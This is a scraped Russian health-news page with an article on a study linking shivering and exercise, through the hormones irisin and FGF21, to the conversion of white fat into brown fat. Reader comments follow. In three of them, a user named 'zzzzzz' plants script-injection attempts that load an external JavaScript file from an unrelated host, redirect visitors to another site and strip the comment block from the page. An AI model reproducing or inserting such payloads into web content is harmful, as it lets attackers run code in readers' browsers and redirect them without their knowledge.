Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Радуйтесь холодам! Это по...  >>  Радуйтесь холодам! Это поможет похудеть
 
Обратная связь
 

Радуйтесь холодам! Это поможет похудеть

Размер шрифта
15 декабря 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказалось, что дрожать от холода очень полезно. Недавнее исследование говорит о том, что дрожание, наравне с физическими нагрузками, способно стимулировать переход белого жира в бурый, который в свою очередь способствует похудению.

Радуйтесь холодам! Это поможет похудеть

Доктор Пол Ли, эндокринолог из Гарванского Института в Сиднее, обнаружил связь между жировой и мышечной тканями, которые взаимодействуют благодаря специальным гормонам, стимулирующим переход клеток белого жира в бурый, тем самым обеспечивая защиту от холода. Результаты его исследования были опубликованы в журнале Cell Metabolism. Белый жир накапливает энергию – около 50 грамм его способны хранить более 300 килокалорий. Такое же количество бурого жира, наоборот, способно сжигать около 300 килокалорий в сутки. Доктор Ли показал, что во время пребывания на холоде, как и во время тренировок, уровень гормона ирисина (выделяется мышцами) и уровень FGF21 (образуется коричневым жиром) повышались. В условиях лаборатории ирисин и FGF21 были способны преобразовать клетки белого жира в бурый за шесть дней.

Мы все рождаемся с небольшими скоплениями бурого жира в области шеи – это помогает поддерживать температуру тела и сохранять тепло. До недавнего времени считалось, что бурый жир исчезает в раннем детстве, но сейчас мы знаем, что он присутствует и у взрослых людей, причем чем его больше, тем человек стройнее.

«Сейчас количество исследований бурого жира стремительно растет, так как его способность сжигать большое количество калорий может помочь в поиске лекарств от ожирения и диабета», – объясняет доктор Ли. «Уровень сахара крови в среднем ниже у людей, у которых количество бурого жира больше». В своей работе Ли хотел выяснить, как именно происходит активация бурого жира.

Тело человека может ощущать изменения окружающей среды и реагировать на них благодаря работе нервной системы и действию гормонов. «Когда нам холодно, организм активирует бурый жир, так как он сжигает энергию и благодаря этому образует много тепла. Когда этой энергии недостаточно, мышцы начинают сокращаться – возникает дрожь; таким образом также образуется тепло. Однако мы точно не знали, как именно взаимодействуют мышечная и жировая ткани в этой ситуации», – говорит Ли. «Мы поместили добровольцев в холодные условия, снижали температуру с 18 до 12 градусов, пока все участники не начинали дрожать. Мы взяли у каждого из участников анализ крови, чтобы измерить уровень гормонов, а также зафиксировали мышечную дрожь при помощи приборов, которые крепятся на кожу и измеряют электрическую активность мышц».

Ученые определили, что добровольцы начинали дрожать при температуре от 16 до 14 градусов. «Мы обнаружили, что два гормона реагируют на холод – это ирисин и FGF21, выделяемые мышцами и бурым жиром соответственно. Эти гормоны увеличивали уровень потребления энергии жировыми клетками, которые вскоре начинали выделять тепло, что является характерным признаком бурого жира», – отмечает Ли.

Ли также предложил всем участникам эксперимента на холоде пройти еще и тест с физической нагрузкой, чтобы сравнить эти два процесса. «Мы обнаружили, что занятие на велотренажере в умеренном темпе в течение часа приводит к образованию такого же количества ирисина, как и дрожание от холода в течение 10-15 минут», – отметил он. «С медицинской точки зрения, ирисин и FGF21 – это система гормонов, благодаря изучению которой мы сможем в будущем разработать новые препараты для лечения ожирения».

Так что возможно уже очень скоро можно будет эффективно бороться с лишним весом благодаря собственным ресурсам организма – скоплениям бурого жира.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Violensa

19 декабря 2014 в 13:20

Комментарий удален за нарушение Правил общения

2 - Гость

19 декабря 2014 в 14:20

Цитировать   |   Пожаловаться

про средства модельформ для снижения веса можете что-то рассказать? спасибо

 

3 - Pety1236

21 декабря 2014 в 15:24

Комментарий удален за нарушение Правил общения

4 - Гость

14 июня 2015 в 18:08

Цитировать   |   Пожаловаться

Неправда всё это. Дрожать от холода, можно ещё заработать воспаление лёгких или насморк. Ведь зима и холода - это время простудных заболеваний.

5 - zzzzzz

30 июня 2015 в 18:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 21:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 22:23

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Греетесь дома? Вы толстеете в тепле!   5 неожиданных причин, почему вы толстеете   Не выспались? Вы потолстеете!   Как уменьшить жир на лице?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 
07 августа 2012В Америке зарегистрирован новый препарат для снижения веса! 25 августа 2011Почему диабет поражает не всех?
 

Слайдшоу

1
Как не сорваться на диете и похудеть?
Почему вы переедаете: 5 причин
Как нас обманывают! Продукты-обманщики!

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.